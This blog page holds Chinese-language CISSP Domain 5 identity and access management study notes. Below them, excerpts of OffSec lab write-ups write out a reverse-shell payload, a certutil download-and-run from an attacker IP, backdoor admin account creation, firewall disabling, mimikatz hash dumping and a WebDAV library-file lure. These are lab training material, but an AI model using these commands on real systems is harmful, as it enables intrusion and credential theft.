CISSP EXAM Outline - Domain 5

-

 Identity and Access Management (IAM)

身份識別訪問管理


5.1 控制對資產的物理和邏輯訪問 Control physical and logical access to assets

  • 信息 Information
    • 專用系統(dedicated system)中,所有用戶必須對系統處理的最高級別信息具有有效的安全許可,必須對系統處理的所有信息具有訪問權限,並且必須有了解所有處理信息的有效需求。
    • 內容相關(Content-dependent)的訪問控制側重於每個字段的內部數據。例如 : 關注字段存儲的數據。
    • SOAP 的全名為 Simple Object Access Protocol (簡易物件通訊協定),是一種以XML為基礎的通訊協定,其作用是編譯網路服務所需的要求或回應後,再將編譯後的訊息送出到網路,簡單來說就是應用程式和用戶之間傳輸資料的一種機制。 
  • 系統 Systems
    • Ring 0 可以直接訪問最多的資源。
  • 設備 Devices
  • 設施 Facilities
  • 應用程序 Applications




5.2 管理對人員、設備和服務的身份認證與驗證 Manage identification and authentication of people, devices, and services

  • 實施施身份管理 (IdM) Identity Management (IdM) implementation
  • 單/多因子驗證 (MFA) Single/Multi-Factor Authentication (MFA)
    • 虹膜掃描比許多其他類型的生物特徵因素具有更長的使用壽命,因為它們在人的一生中不會改變(除非眼睛本身受損)。虹膜是位於黑色瞳孔和白色鞏膜之間的圓環狀部分,在胎兒發育階段形成後,在整個生命歷程中將是保持不變的。
    • 視網膜掃描可以揭示其他信息,包括高血壓和懷孕,從而引起隱私問題。
    • 視網膜掃描是十分精確的,但它要求使用者注視接收器並盯著一點。這對於戴眼鏡的人來說很不方便,而且與接受器的距離很近,也讓人不太舒服。是一種非主流的生物識別產品。由於需雷射照射, 可能會給用戶帶來健康損壞, 因而還需進一步研究,視網膜識別技術對用戶沒有吸引力。

  • 可核查性 Accountability
    • 日誌記錄(Logging)可以記錄活動但跟稽核(Audit)是兩回事,需要進行審查稽核以發現問題。
    • Logging + Auditing = Accountability
    • 問責制(Accountability)不包括授權(Authorization)。
  • 會話管理 Session management
    • 會話管理的最佳實踐涉及較長的會話 ID(通常為 128 位或更長)和足夠的隨機性或熵,從而難以猜測會話 ID。
  • 身份註冊、證明和建立 Registration, proofing, and establishment of identity
  • 聯合身份管理 (FIM) Federated Identity Management (FIM)
  • 憑證管理系統 Credential management systems
  • 單點登錄 (SSO) Single Sign On (SSO)
  • 即時生產 (JIT) Just-In-Time (JIT)
    • 如今,網站通過即時從身份提供者那裡檢索客戶的個人資料以簡化註冊和配置過程來創建新帳戶的情況並不少見。這種做法也稱為即時供應(just-in-time provisioning)。
    • 系統可在需要時提供所需的訪問權限。
    • JIT 或即時供應機制在需要時創建帳戶,而不是提前創建帳戶。這是一種限制所維護帳戶數量的有效方法,如果用戶帳號是許可協議的一部分,它可能會很有用。




5.3 通過第三方服務進行聯合身份驗證 Federated identity with a third-party service

  • 本地部署 On-premise
  • 雲端 Cloud
  • 混合 Hybrid
    • 同時擁有 on-premise & Cloud 時採用 Hybrid 架構。




5.4 實施和管理授權機制 Implement and manage authorization mechanisms

  • 基於角色的訪問控制 (RBAC) Role Based Access Control (RBAC)
    • 一般透過 Groups 來實現。
    • 基於職責(Job Roles)的一種訪問控制。
  • 基於規則的訪問控制 Rule based access control
    • 典型代表 : 防火牆。
  • 強制訪問控制 (MAC) Mandatory Access Control (MAC)
    • 強制訪問控制 (MAC) 模型是禁止性的,它使用隱式拒絕哲學(而不是顯式拒絕哲學)。它是不允許的,它使用標籤而不是規則。
    • 隱式拒絕原則確保對對象的訪問被拒絕,除非已明確允許(或明確授予)主體的訪問權限。它不允許所有未拒絕​​的操作,也拒絕所有未明確允許的行為。
    • 在強制訪問控制系統中,所有主體和客體都有一個標籤。可以使用也可以不使用隔間,但是對於要劃分的主體或客體沒有特定的要求。
    • Biba 使用點陣來控制訪問,是強制訪問控制 (MAC) 模型的一種形式。
    • 強制訪問控制使用點陣或矩陣來描述分類標籤如何相互關聯。
    • MAC based on 系統決定訪問原則
  • 自主訪問控制 (DAC) Discretionary Access Control (DAC)
    • 非自主訪問控制(Non-DAC)模型使用中央權限來確定用戶(和其他主體)可以訪問哪些對象(例如文件)。
    • 自主訪問控制 (DAC) 模型是基於身份的訪問控制模型。它允許資源的所有者(或數據保管人)根據所有者的判斷授予權限。
    • 數據保管人 custodian(或數據所有者 owner)在自主訪問控制 (DAC) 模型中向用戶授予權限。
  • 基於屬性的訪問控制 (ABAC) Attribute Based Access Control (ABAC)
    • 基於時間的控件是上下文相關控件(context-dependent controls)的一種範例。
    • 用於 ABAC 的屬性通常屬於以下四類之一: 
      • 學科屬性,如部門或職稱
      • 操作屬性,例如查看、編輯或刪除的能力
      • 描述可能受到影響的對象的對象屬性
      • 上下文屬性,如位置、時間或元素
  • 基於風險的訪問控制 Risk based access control
    • NAC 是一種基於風險的訪問控制形式,因為不合規的系統被認為風險較高,要麼被放隔離在補救網絡或區域中,要麼在它們合規之前被禁止連接到網絡。
    • XACML 提供細粒度的訪問控制,例如基於風險或基於屬性的訪問控制

    • PEP (Policy Enforcement Point) : Web Server --> 政策執行點
      • 通過做出決策請求和執行授權決策來執行訪問控制的最後系統實體
    • PDP (Policy Decision Point) : Authorization Server --> 政策決策點
      • 評估適用政策並做出授權決定的系統實體
    • PAP (Policy Administration Point): Policy Manager --> 政策管理者
      • 創建政策或政策集的系統實體, 存放政策的地方
    • PIP :(Policy Information Point) Attributes Collector --> 屬性收集者
      • 作為屬性值來源的系統實體, 存放屬性參考的地方(例如 Directory 資料庫)
  • 基於知識的身份驗證(Knowledge-based authentication)依賴於預設問題
    • 例如“您的寵物叫什麼名字?” 和答案。
  • 能力表(Capability tables) : 能力表列出了分配給主體的權限並標識主體可以訪問的對象。
    • 關注主體 Subject
  • 訪問控制列表(Access control lists) : 訪問控制列表以對象為中心,而不是以主題為中心。
    • 關注客體 Object



5.5 管理身份和訪問配置生命週期 Manage the identity and access provisioning lifecycle

  • 帳戶訪問審查(如用戶、系統、服務) Account access review (e.g., user, system, service)
    • 捕鯨(Whaling )是一種針對高級管理人員的網絡釣魚形式。
  • 預配和取消預配(如入職、離職和調動) Provisioning and deprovisioning (e.g., on /off boarding and transfers)
    • SPML : 將有關提供的服務的信息發送給第三方組織。服務供應標記語言 (SPML) 是一種基於 XML 的語言,旨在允許平台生成和響應供應請求。
    • SOAP 或簡單對象訪問協議是一種消息傳遞協議,可用於任何 XML 消息傳遞,但它本身不是標記語言。
  • 角色定義(例如,分配到新角色的人員) Role definition (e.g., people assigned to new roles)
  • 特權升級(例如,託管服務帳戶、使用 sudo、最小化其使用) Privilege escalation (e.g., managed service accounts, use of sudo, minimizing its use)
    • 過度特權 (excessive privileges) : 當用戶擁有的權限超過完成工作所需的權限時,他們就擁有過多的權限。例如新工作開始,發現可以訪問各種不需要完成工作的系統。




5.6 部署身份驗證系統 Implement authentication systems

  • OpenID 連接 (OIDC) / 開放式授權 (Oauth) OpenID Connect (OIDC)/Open Authorization (Oauth)
  • 安全斷言標記語言 (SAML) Security Assertion Markup Language (SAML)
    • 狀態令牌的創建和交換旨在防止 CSRF 類型的攻擊
  • Kerberos
    • TGS 或票據授予服務(通常與 KDC 在同一台服務器上)從客戶端接收 TGT。它驗證 TGT 和用戶訪問他們請求使用的服務的權限。然後 TGS 向客戶端發出票證和會話密鑰。 AS作為認證服務器,將用戶名轉發給KDC。
    • 客戶端將用戶名和密碼發送到 KDC 採用 AES 加密
    • Kerberos 使用密鑰加密消息,為身份驗證流量提供保護。KDC 都是單點故障,如果受到破壞,可能會導致問題,因為密鑰存儲在 KDC 上,允許攻擊者冒充任何​​用戶。與許多身份驗證方法一樣,Kerberos 很容易受到密碼猜測的影響。
    • KDC 使用用戶的密碼生成散列,然後使用該散列加密對稱密鑰。它將加密的對稱密鑰和加密的時間戳 TGT 傳輸到客戶端。
    • Kerberos 為身份驗證流量提供機密性和完整性保護安全服務
    • 順序 :
      • 用戶提供身份驗證憑據
      • 客戶端/TGS 密鑰的生成
      • TGT 生成與派發至客戶端
      • 客戶端/服務器票證生成與派發至客戶端
      • 用戶訪問服務
  • 遠程驗證撥號用戶服務 (RADIUS) / 增強型終端訪問控制器訪問控制系統 (TACACS+) Remote Authentication Dial-In User Service (RADIUS)/Terminal Access Controller Access Control System Plus (TACACS+)
    • Diameter 基於遠程身份驗證撥入用戶服務 (RADIUS),它支持移動 IP 和 IP 語音 (VoIP)。
    • TACACS+ 是身份驗證、授權和記帳 (AAA) 協議,是 RADIUS 的替代方案,而不是基於 RADIUS。






ISC2 連結 : CISSP Exam Outline (isc2.org) 






留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容